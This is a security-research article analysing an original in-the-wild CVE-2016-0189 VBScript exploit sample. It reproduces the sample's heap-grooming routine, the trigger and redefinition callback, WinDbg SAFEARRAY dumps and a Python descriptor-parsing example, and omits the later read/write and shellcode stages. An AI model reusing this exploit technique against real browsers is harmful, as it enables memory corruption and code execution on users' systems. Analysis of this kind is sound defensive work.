At the end of October last year I obtained a CVE-2016-0189 sample that is not quite the same as the publicly known one. From a preliminary analysis I believe it is the original in-the-wild attack file for CVE-2016-0189 from that year. Its obfuscation approach is exactly the same as that of the later CVE-2017-0149, CVE-2018-8174 and CVE-2018-8373 samples, and its exploitation and shellcode-loading techniques are also the same as those used by these later exploits.
At the time I was busy with other things and did not study the sample carefully. A few days ago I dug the relevant samples out again and spent a lot of time debugging them.
In this article I describe the exploitation method used by this CVE-2016-0189 sample. As the reader will see later, the type-confusion ("misalignment") technique used in the exploitation process is almost identical to that of CVE-2014-6332, CVE-2017-0149, CVE-2018-8174 and CVE-2018-8373.
The CVE-2016-0189 samples that were publicly known before this are basically all based on the code released in the article referenced here; I analysed the details of that disclosed exploit code in an earlier article.
Below we take a look at the technique used by the actual CVE-2016-0189 0day sample from three years ago.
Memory layout
The sample currently enters the exploit function by means of the following code (the opening script tag is not reproduced here):
    document.write("var obj = {}; obj.toString = function() { my_valueof(); return 0; }; StartExploit(obj);" & Unescape("%3c/script%3e"))
In the StartExploit function, the prepare function is called first to lay out memory. Each execution of arr2(i) = Null causes the memory of one tagSAFEARRAY structure to be freed.
    ReDim arr(0, 0)
    arr(0, 0) = 3 ' important step: after the type confusion the number 3 is interpreted as the VARIANT type vbLong (3)
    …
    Sub prepare
        Dim arr5()
        ReDim arr5(2)
        For i = 0 To 17
            arr3(i) = arr5
        Next
        For i = 0 To &h7000
            arr1(i) = arr
        Next
        For i = 0 To 1999
            arr2(i) = arr ' initialise every member of arr2 to an array
        Next
        For i = 1000 To 100 Step -3
            arr2(i)(0, 0) = 0
            arr2(i) = Null ' free one third of the elements between arr2(100) and arr2(1000)
        Next
        ReDim arr4(0, &hFFF) ' define arr4
    End Sub
    Function StartExploit(js_obj)
        ' unrelated code omitted
        prepare
        arr4(js_obj, 6) = &h55555555
        For i = 0 To 1999
            If IsArray(arr2(i)) = True Then
                If UBound(arr2(i), 1) > 0 Then
                    vul_index = i
                    Exit For
                End If
            End If
        Next
        lb_index = LBound(arr2(i), 1)
        If prepare_rw_mem() = True Then
        Else
            Exit Function
        End If
        addr = leak_addr()
        ' subsequent code omitted
    End Function
Each tagSAFEARRAY occupies 0x30 bytes in memory, of which the last 0x20 bytes hold the actual tagSAFEARRAY contents (the first 0x10 bytes are the allocation prefix in which oleaut32 stores the element VARTYPE, here 0xc = VT_VARIANT, just before the structure).
    0:015> !heap -p -a 052a9fb0
        address 052a9fb0 found in
        _HEAP @ 360000
          HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
            052a9f98 0007 0000  [00]   052a9fa0    00030 - (busy)
    0:015> dd 052a9fa0 l30/4
    052a9fa0  00000000 00000000 00000000 0000000c
    052a9fb0  08800002 00000010 00000000 0529d640
    052a9fc0  00000001 00000000 00000001 00000000
    0:015> dt ole32!tagSAFEARRAY 052a9fb0
       +0x000 cDims      : 2
       +0x002 fFeatures  : 0x880
       +0x004 cbElements : 0x10
       +0x008 cLocks     : 0
       +0x00c pvData     : 0x0529d640
       +0x010 rgsabound  : [1] tagSAFEARRAYBOUND
The whole release process produces roughly 300 memory holes of size 0x30.
Triggering the vulnerability
Once the memory layout is complete, the exploit code uses the statement arr4(js_obj, 6) = &h55555555 to enter the custom my_valueof callback, and inside that callback it redefines arr4. This causes the memory originally pointed to by arr4's pvData to be freed and new memory to be allocated according to the newly required size.
    Sub my_valueof()
        ReDim arr4(2, 0)
    End Sub
The statement above causes the pvData of arr4(2, 0) to be allocated as a 0x30-byte block (3 VARIANTs of 0x10 bytes each); given the memory layout built up earlier, this allocation reuses one of the just-freed tagSAFEARRAY blocks.
Let us look more closely at the execution logic of the statement arr4(js_obj, 6) = &h55555555.
The root cause of CVE-2016-0189 is that when AccessArray encounters a JavaScript object as an index it can trigger a callback into the overloaded function, here my_valueof. The exploit code redefines arr4 as arr4(2, 0) inside my_valueof; when the callback returns to AccessArray, arr4's tagSAFEARRAY structure and its pvData pointer have already been modified, but AccessArray continues executing and still computes the element address according to the original arr4(0, 6), storing the computed address in a stack variable.
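To make the windbg dump above and the stale-index problem concrete, here is an added example (my own code, not part of the sample or of the original article) that parses the 0x30-byte heap block from the dd output into the tagSAFEARRAY fields shown by dt, and then performs the bounds check that AccessArray should repeat after the callback. The arr4(2, 0) descriptor is constructed with an assumed pvData; the field layout and the rightmost-dimension-first bound order follow the 32-bit oleaut32 definitions.

```python
import struct

# Constructed from the page's "dd 052a9fa0 l30/4" output: the 0x30-byte heap block
# that holds the descriptor of arr (a 2-D VBScript array with one VARIANT element).
DUMP_DWORDS = [0x00000000, 0x00000000, 0x00000000, 0x0000000c,   # 0x10-byte prefix, VARTYPE at -4
               0x08800002, 0x00000010, 0x00000000, 0x0529d640,   # cDims|fFeatures, cbElements, cLocks, pvData
               0x00000001, 0x00000000, 0x00000001, 0x00000000]   # rgsabound[0], rgsabound[1]
HEAP_BLOCK = struct.pack("<12I", *DUMP_DWORDS)

FADF = {0x001: "FADF_AUTO", 0x002: "FADF_STATIC", 0x004: "FADF_EMBEDDED",
        0x010: "FADF_FIXEDSIZE", 0x020: "FADF_RECORD", 0x040: "FADF_HAVEIID",
        0x080: "FADF_HAVEVARTYPE", 0x100: "FADF_BSTR", 0x200: "FADF_UNKNOWN",
        0x400: "FADF_DISPATCH", 0x800: "FADF_VARIANT"}
VT_VARIANT = 12

def parse_safearray(block, desc_off=0x10):
    """Decode a 32-bit tagSAFEARRAY at block[desc_off:] plus the VARTYPE that
    oleaut32 keeps 4 bytes before it when FADF_HAVEVARTYPE is set."""
    cdims, ffeat, cbelem, clocks, pvdata = struct.unpack_from("<HHIII", block, desc_off)
    bounds = [struct.unpack_from("<Ii", block, desc_off + 0x10 + 8 * i) for i in range(cdims)]
    vt = struct.unpack_from("<I", block, desc_off - 4)[0] if ffeat & 0x80 else None
    return {"cDims": cdims, "fFeatures": ffeat,
            "features": [n for b, n in FADF.items() if ffeat & b],
            "cbElements": cbelem, "cLocks": clocks, "pvData": pvdata, "vt": vt,
            "rgsabound": [{"cElements": c, "lLbound": l} for c, l in bounds],
            "size": 0x10 + 8 * cdims}     # descriptor bytes: header plus one bound per dimension

def element_address(desc, indices):
    """Address of arr(indices...) with VBScript index order (leftmost first), or None
    when any index lies outside rgsabound. Bounds are stored rightmost dimension
    first and the leftmost index varies fastest, as SafeArrayPtrOfIndex lays it out."""
    if len(indices) != desc["cDims"]:
        return None
    cell, stride = 0, 1
    for idx, b in zip(indices, reversed(desc["rgsabound"])):
        if not (b["lLbound"] <= idx < b["lLbound"] + b["cElements"]):
            return None                    # this is the check that must be redone after a callback
        cell += (idx - b["lLbound"]) * stride
        stride *= b["cElements"]
    return desc["pvData"] + cell * desc["cbElements"]

# Constructed descriptor for what "ReDim arr4(2, 0)" produces: 3 x 1 VARIANTs at an assumed pvData.
ARR4_AFTER_REDIM = {"cDims": 2, "cbElements": 0x10, "pvData": 0x0529d640,
                    "rgsabound": [{"cElements": 1, "lLbound": 0}, {"cElements": 3, "lLbound": 0}]}

if __name__ == "__main__":
    d = parse_safearray(HEAP_BLOCK)
    print(d["cDims"], hex(d["fFeatures"]), d["features"], hex(d["pvData"]), d["vt"] == VT_VARIANT)
    print(hex(element_address(d, (0, 0))), element_address(d, (0, 6)))
    print(element_address(ARR4_AFTER_REDIM, (0, 6)))   # None: (0, 6) is outside a 3 x 1 array
```

Against the redefined 3 x 1 descriptor the stale index (0, 6) is rejected; AccessArray in the vulnerable build skips this re-check and uses the address it computed for the old arr4(0, &hFFF) layout.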